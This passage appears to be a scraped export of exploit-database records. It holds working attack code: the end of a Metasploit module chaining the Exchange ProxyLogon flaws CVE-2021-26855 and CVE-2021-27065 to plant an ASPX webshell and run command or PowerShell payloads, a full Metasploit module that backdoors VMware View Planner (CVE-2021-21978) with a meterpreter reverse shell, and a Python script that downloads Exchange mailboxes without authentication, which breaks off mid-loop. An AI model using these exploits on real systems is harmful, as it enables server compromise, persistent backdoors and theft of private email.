RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n ExternalUrl: shell.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => 
patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n input_name\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def patch_sid(sid)\n ar = sid.to_s.split('-')\n if ar[-1] != '500'\n sid = \"#{ar[0..6].join('-')}-500\"\n end\n\n sid\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n \"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\",\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? 
|| server.empty?\n\n [server, legacy_dn]\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(server_name, legacy_dn, server_id)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response.code == 200\n sid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/\n\n sid = response.body.match(sid_regex).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def request_oab(server_name, sid, session, canary)\n data = {\n filter: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n SelectedView: '',\n SelectedVDirType: 'OAB'\n }\n },\n sort: {}\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: session,\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n\n if response.code == 200\n data = JSON.parse(response.body)\n data['d']['Output'].each do |oab|\n if oab['Server'].downcase == server_name.downcase\n return [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']]\n end\n end\n end\n\n []\n end\n\n def request_proxylogon(server_name, sid)\n data = \"<r 
at=\\\"Negotiate\\\" ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\"\n session_id = ''\n canary = ''\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'text/xml; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n if response.code == 241\n session_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n canary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ...\n end\n\n [session_id, canary]\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_26855\n # request for internal server name.\n response = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\")\n if response.code != 500 || !response.headers.to_s.include?('X-FEServer')\n fail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found')\n end\n\n server_name = response.headers['X-FEServer']\n print_status(\"Internal server name (#{server_name})\")\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n\n # get the user UID using mapi request.\n print_status(message('Sending mapi request'))\n sid = request_mapi(server_name, legacy_dn, server_id)\n print_status(\"SID: #{sid} (#{datastore['EMAIL']})\")\n\n # search oab\n sid, session, canary, oab_id = search_oab(server_name, sid)\n\n [server_name, sid, session, canary, oab_id]\n end\n\n # post-auth arbitrary file write.\n def run_cve_2021_27065(session_info)\n # set external url (and set the payload).\n print_status('Prepare the payload on the remote target')\n input_name = install_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t prepare the 
payload on the remote target') if input_name.empty?\n\n # reset the virtual directory (and write the payload).\n print_status('Write the payload on the remote target')\n remote_file = write_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty?\n\n # wait a lot.\n i = 0\n while i < datastore['MaxWaitLoop']\n received = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(web_directory, remote_file)\n })\n if received && (received.code == 200)\n break\n end\n\n print_warning(\"Wait a lot (#{i})\")\n sleep 5\n i += 1\n end\n fail_with(Failure::PayloadFailed, 'Could\\'t take the remote backdoor (see. ExchangePathBase option)') if received.code == 302\n\n [input_name, remote_file]\n end\n\n def search_oab(server_name, sid)\n # request cookies (session and canary)\n print_status(message('Sending ProxyLogon request'))\n\n print_status('Try to get a good msExchCanary (by patching user SID method)')\n session_id, canary = request_proxylogon(server_name, patch_sid(sid))\n if canary\n session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, session, canary)\n end\n\n if oab_id.nil? || oab_id.empty?\n print_status('Try to get a good msExchCanary (without correcting the user SID)')\n session_id, canary = request_proxylogon(server_name, sid)\n if canary\n session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, session, canary)\n end\n end\n\n fail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty?\n fail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty?\n fail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? 
|| oab_id.empty?\n\n print_status(\"ASP.NET_SessionId: #{session_id}\")\n print_status(\"msExchEcpCanary: #{canary}\")\n print_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\")\n\n return [sid, session, canary, oab_id]\n end\n\n def send_http(method, ssrf, opts = {})\n ssrf = \"X-BEResource=#{ssrf};\"\n if opts[:cookie] && !opts[:cookie].empty?\n opts[:cookie] = \"#{ssrf} #{opts[:cookie]}\"\n else\n opts[:cookie] = ssrf.to_s\n end\n\n opts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil?\n\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype]\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n web_dir = datastore['IISWritePath'].gsub('\\\\', '/')\n else\n web_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n web_dir\n end\n\n def write_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n remote_file = \"#{rand_text_alpha(4..8)}.aspx\"\n if datastore['UseAlternatePath']\n remote_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n remote_path = 
\"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n else\n remote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n end\n\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n FilePathName: remote_path.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n remote_file\n end\n\n def exploit\n @proto = (ssl ? 
'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n exploit_info = run_cve_2021_26855\n\n print_status(message('Attempt to exploit for CVE-2021-27065'))\n shell_info = run_cve_2021_27065(exploit_info)\n\n @random_inputname = shell_info[0]\n @random_filename = shell_info[1]\n\n print_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n if datastore['UseAlternatePath']\n remote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\"\n else\n remote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\"\n end\n register_files_for_cleanup(remote_file)\n\n # trigger powa!\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n response = execute_command(\"cmd /c #{payload.encoded}\")\n\n print_warning('Dumping command output in response')\n output = response.body.split('Name :')[0]\n if output.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(output)\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36024", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-21T21:20:59", "description": "This Metasploit module exploits an unauthenticated log file upload within the log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 Security Patch 1. 
Successful exploitation will result in remote code execution as the apache user inside the appacheServer Docker container.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-19T00:00:00", "type": "zdt", "title": "VMware View Planner 4.6 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-19T00:00:00", "id": "1337DAY-ID-35998", "href": "https://0day.today/exploit/description/35998", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE',\n 'Description' => %q{\n This module exploits an unauthenticated log file upload within the\n log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6\n Security 
Patch 1.\n\n Successful exploitation will result in RCE as the apache user inside\n the appacheServer Docker container.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu', # Analysis and PoC\n 'Grant Willcox' # Metasploit Module\n ],\n 'References' => [\n ['CVE', '2021-21978'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'],\n ['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC\n ],\n 'DisclosureDate' => '2021-03-02', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'python',\n 'Targets' => [\n [\n 'VMware View Planner 4.6.0',\n {\n 'Arch' => ARCH_PYTHON,\n 'Type' => :linux_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_tcp'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n unless res.code == 200 && !res.body.empty?\n return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')\n end\n\n @original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.\n\n if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:')\n return CheckCode::Safe(\"Target's log_upload_wsgi.py file has been patched.\")\n end\n\n CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')\n end\n\n # We need to upload a file twice: once 
for uploading the backdoor, and once for restoring the original file.\n # As the code for both is the same, minus the content of the file, this is a generic function to handle that.\n def upload_file(content)\n mime = Rex::MIME::Message.new\n mime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\")\n mime.add_part('{\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'logupload'),\n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\",\n 'data' => mime.to_s\n )\n unless res.to_s.include?('File uploaded successfully.')\n fail_with(Failure::UnexpectedReply, \"Target indicated that the file wasn't uploaded successfully!\")\n end\n end\n\n def exploit\n # Here we want to grab our template file, taken from a clean install but\n # with a backdoor section added to it, and then fill in the PAYLOAD placeholder\n # with the payload we want to execute.\n data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)\n file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py'))\n\n payload.encoded.gsub!(/\"/, '\\\\\"')\n file_content['PAYLOAD'] = payload.encoded\n\n # Now that things are primed, upload the file to the target.\n print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')\n upload_file(file_content)\n print_good('Backdoor uploaded!')\n\n # Use the OPTIONS request to trigger the backdoor. 
Technically this\n # could be any other method including invalid ones like BACKDOOR, but for\n # the purposes of stealth lets use a legitimate one.\n print_status('Sending request to execute the backdoor!')\n send_request_cgi(\n 'method' => 'OPTIONS',\n 'uri' => normalize_uri(target_uri.path, 'logupload')\n )\n ensure\n # At this point we should have our shell after waiting a few seconds,\n # so lets now restore the original file so we don't leave anything behind.\n print_status('Reuploading the original code to remove the backdoor!')\n upload_file(@original_content)\n print_good('Original file restored, enjoy the shell!')\n end\nend\n", "sourceHref": "https://0day.today/exploit/35998", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-08T14:23:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "1337DAY-ID-36262", "href": 
"https://0day.today/exploit/description/36262", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download\n# Exploit Author: Gonzalo Villegas a.k.a Cl34r\n# Vendor Homepage: https://www.microsoft.com/\n# Version: OWA Exchange 2013 - 2019\n# Tested on: OWA 2016\n# CVE : CVE-2021-26855\n# Details: checking users mailboxes and automated downloads of emails\n\nimport requests\nimport argparse\nimport time\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n__proxies__ = {\"http\": \"http://127.0.0.1:8080\",\n \"https\": \"https://127.0.0.1:8080\"} # for debug on proxy\n\n\n# needs to specifies mailbox, will return folder Id if account exists\npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"inbox\">\n <t:Mailbox>\n <t:EmailAddress>{}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n\n\"\"\"\n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails)\npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:FindItem Traversal=\"Shallow\">\n <m:ItemShape>\n 
<BaseShape>AllProperties</BaseShape></m:ItemShape>\n <SortOrder/>\n <m:ParentFolderIds>\n <t:FolderId Id=\"{}\" ChangeKey=\"{}\"/>\n </m:ParentFolderIds>\n <QueryString/>\n </m:FindItem>\n </soap:Body>\n</soap:Envelope>\n\"\"\"\n\n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox\npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\">\n <ItemShape>\n <t:BaseShape>Default</t:BaseShape>\n </ItemShape>\n <ItemIds>\n <t:ItemId Id=\"{}\" ChangeKey=\"{}\"/>\n </ItemIds>\n </GetItem>\n </soap:Body>\n </soap:Envelope>\n\"\"\"\n\n\ndef getFQDN(url):\n print(\"[*] Getting FQDN from headers\")\n rs = requests.post(url + \"/owa/auth.owa\", verify=False, data=\"evildata\")\n if \"X-FEServer\" in rs.headers:\n return rs.headers[\"X-FEServer\"]\n else:\n print(\"[-] Can't get FQDN \")\n exit(0)\n\n\ndef extractEmail(url, uri, user, fqdn, content_folderid, path):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla pwner\"}\n from xml.etree import ElementTree as ET\n dom = ET.fromstring(content_folderid)\n for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):\n id_folder = p[0].attrib.get(\"Id\")\n change_key_folder = p[0].attrib.get(\"ChangeKey\")\n data = payload_get_items_id_folder.format(id_folder, change_key_folder)\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\n rs = 
requests.post(url + uri, data=data, headers=headers, verify=False)\n if \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Denied ;(.. retrying\")\n t_uri = uri.split(\"/\")[-1]\n for ru in random_uris:\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\n if \"NoError\" in rs.text:\n print(\"[+] data found, dowloading email\")\n break\n print(\"[+]Getting mails...\")\n dom_messages = ET.fromstring(rs.text)\n messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')\n for m in messages:\n id_message = m[0].attrib.get(\"Id\")\n change_key_message = m[0].attrib.get(\"ChangeKey\")\n data = payload_get_mail.format(id_message, change_key_message)\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\n if \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Denied ;(.. retrying\")\n t_uri = uri.split(\"/\")[-1]\n for ru in random_uris:\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\n if \"NoError\" in rs.text:\n print(\"[+] data found, downloading email\")\n break\n\n try:\n f = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+')\n f.write(rs.text)\n f.close()\n except Exception as e:\n print(\"[!] 
Can't write .xml file to path (email): \", e)\n\n\ndef checkURI(url, fqdn):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla hehe\"}\n arr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"]\n for uri in arr_uri:\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"[email\u00a0protected]\"),\n headers=headers)\n #print(rs.content)\n if rs.status_code == 200 and \"MessageText\" in rs.text:\n print(\"[+] Valid URI:\", uri)\n calculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\")\n if calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"):\n calculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1]\n else:\n calculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1]\n return uri, calculated_domain\n #time.sleep(1)\n print(\"[-] No valid URI found ;(\")\n exit(0)\n\n\ndef checkEmailBoxes(url, uri, user, fqdn, path):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla hehe\"}\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user),\n headers=headers)\n #time.sleep(1)\n #print(rs.content)\n if \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user))\n if \"ResponseCode\" in rs.text and \"NoError\" in rs.text:\n print(\"[+] Valid Email Found!: {}\".format(user))\n extractEmail(url, uri, user, fqdn, rs.text, path)\n if \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text:\n print(\"[-] Not Valid Email: {}\".format(user))\n\n\ndef main():\n __URL__ = None\n __FQDN__ = None\n __mailbox_domain__ = None\n __path__ = None\n print(\"[***** OhhWAA *****]\")\n parser = 
argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\")\n parser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True)\n parser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True)\n parser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True)\n parser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None)\n parser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None)\n args = parser.parse_args()\n __URL__ = args.url\n __FQDN__ = args.fqdn\n __mailbox_domain__ = args.domain\n __list_users__ = args.list\n __valid_users__ = []\n __path__ = args.path\n if not __FQDN__:\n __FQDN__ = getFQDN(__URL__)\n print(\"[+] Got FQDN:\", __FQDN__)\n\n valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)\n\n if not __mailbox_domain__:\n __mailbox_domain__ = calculated_domain\n\n list_users = open(__list_users__, \"r\")\n for user in list_users:\n 